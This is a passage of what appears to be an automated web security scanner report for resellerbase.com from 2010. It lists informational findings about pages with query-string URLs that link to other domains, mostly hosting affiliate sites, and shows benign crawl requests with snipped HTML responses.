<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.350. http://www.resellerbase.com/web-service/other/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.351. http://www.resellerbase.com/web-service/other/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/googlepr.php?link_id=9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.352. http://www.resellerbase.com/web-service/other/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:43:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 32002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://hubshout.com" name="link_46"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://hubshout.com" name="link_46"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.353. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.354. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.355. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.356. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.357. http://www.resellerbase.com/web-service/other/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.358. http://www.resellerbase.com/web-service/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:49:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&amp;LinkName=ResellerBase" name="link_12"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&amp;LinkName=ResellerBase" name="link_12"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://hubshout.com" name="link_46"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://hubshout.com" name="link_46"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nicline.com" name="link_28"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nicline.com" name="link_28"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.359. http://www.resellerbase.com/web-service/software-scripts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.360. http://www.resellerbase.com/web-service/software-scripts/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/googlepr.php?link_id=23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.361. http://www.resellerbase.com/web-service/software-scripts/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:44:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 21207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.362. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.363. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.364. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.365. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
